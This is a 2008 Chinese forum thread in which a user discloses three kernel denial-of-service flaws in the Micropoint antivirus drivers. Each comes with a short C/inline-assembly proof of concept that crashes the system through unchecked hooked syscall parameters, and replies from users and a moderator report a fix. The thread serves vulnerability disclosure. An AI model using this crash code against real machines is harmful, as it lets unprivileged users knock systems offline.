» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 主动防御 » 微点主动防御(version20080924及以下）多个内核拒绝服务漏洞之三   作者: 标题: 微点主动防御(version20080924及以下）多个内核拒绝服务漏洞之三 mj0011_decoder 禁止发言 积分 0 发帖 33 注册 2008-10-1 #1  微点主动防御(version20080924及以下）多个内核拒绝服务漏洞之三 继续爆三个漏洞，微点一直没反映啊~看来都度假去了 这样可不行啊 病毒木马可是不休假的哦 O(∩_∩)O哈哈~ (1).微点对NtWriteFile-> Call ObReferenceObjectByHandle的HOOK中未对参数做有效性检查，可导致任意权限用户在安装了微点的系统上可引发系统蓝屏 存在漏洞的文件:mp110011.sys,版本:1.2.10237,CheckSum = 0x0002291a , TimeStamp = 0x488944d9 微点hook了NtWriteFile-> Call ObReferenceObjectByHandle并对其中的FileHandle进行检查，检查对应的设备对象->驱动对象是否是Disk，如果是的话，判断写入的偏移，进行阻截或放行 其中hook函数使用读取外层函数（NtWriteFile)保存的栈指针(ebp)来读取外层函数的参数pByteOffset,但未对该参数做有效性检查，就直接使用，导致了攻击的可能 使用以下代码即可在任意用户权限在使安装了微点的系统蓝屏： HMODULE hlib = LoadLibrary("ntdll.dll"; PVOID p = GetProcAddress(hlib , "ZwWriteFile"; HANDLE hfile = CreateFile("\\\\.\\PhysicalDrive0" , FILE_WRITE_DATA , 0 , 0 , OPEN_EXISTING , 0 , 0 ); if (hfile != INVALID_HANDLE_VALUE) {    __asm    {     push 0     push    1 //->pByteOffset，cannot be zero     push   0     push 0     push 0     push 0     push 0     push 0     push hfile     call p    } } (2).微点在对NtOpenProcess的头部inline hook中，未进行任何参数检查就直接使用参数，导致任意权限用户可引发安装了微点的系统蓝屏 mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E) 在其处理函数中未做任何参数检查，直接使用了参数pClientId 的缓存地址，也没有结构化异常处理，因此直接传递0地址即可使系统蓝屏 测试代码： HMODULE hlib = LoadLibrary("ntdll.dll"; PVOID p = GetProcAddress(hlib , "NtOpenProcess"; __asm{    push 0    push 0    push 1   //access must have "PROCESS_TERMINATE"    push 0    call p } (3).微点对于NtCreateThread的HOOK处理中存在拒绝服务漏洞，可导致任何权限用户在安装了微点的系统上引发蓝屏 mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E) 在其函数中未对参数pContext做任何检查，就使用该参数，并且没有使用任何结构化异常处理，因此只要传0就可以导致蓝屏 测试代码： HMODULE hlib = LoadLibrary("ntdll.dll"; PVOID p = GetProcAddress(hlib , "NtCreateThread"; __asm{    push 1 //need createsuspend    push 0    push 0    push 0    push 0    push 0    push 0    push 0    call p } ※ ※ ※ 本文纯属【mj0011_decoder】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-10-1 18:49 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #2   多几个郑文彬这样的测试用户就好了 ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 你的微笑 is 微点的骄傲！ http://hi.baidu.com/new/micropoint 2008-10-1 20:11 yurong7777777 高级用户 积分 536 发帖 534 注册 2008-9-12 #3   反映得很好，微点就需要这样“挑刺“的人，唯有如此，微点才能进步 ※ ※ ※ 本文纯属【yurong7777777】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-10-2 08:00 snhao 银牌会员 积分 1791 发帖 1782 注册 2007-6-12 #4   真的假的？楼主是郑文彬？ ※ ※ ※ 本文纯属【snhao】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-10-2 10:00 408983504 银牌会员 此用户已被禁言 积分 1271 发帖 1238 注册 2007-1-6 来自 广东 #5     Quote: Originally posted by snhao at 2008-10-2 10:00: 真的假的？楼主是郑文彬？ 郑文彬？何许人也？？ ※ ※ ※ 本文纯属【408983504】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 三用户版续费真TM的便宜啊！ 2008-10-2 10:07 Legend 超级版主 超级版主 积分 77171 发帖 70170 注册 2005-10-29 #6   问题已解决，请楼主用最新的安装包进行测试，如有问题，欢迎再次发帖。（可以联系QQ：383154254 为好友，找他要下新包） ※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※ 微点官方认证新浪微博：欢迎进入 微点新浪微博 微点技术支持邮箱: support@micropoint.com.cn 给Legend发短消息 2008-10-6 14:10 comewhere 新手上路 积分 4 发帖 4 注册 2007-8-16 #7   貌似预升级版 还是会 挂掉.. ※ ※ ※ 本文纯属【comewhere】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-10-8 15:12 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号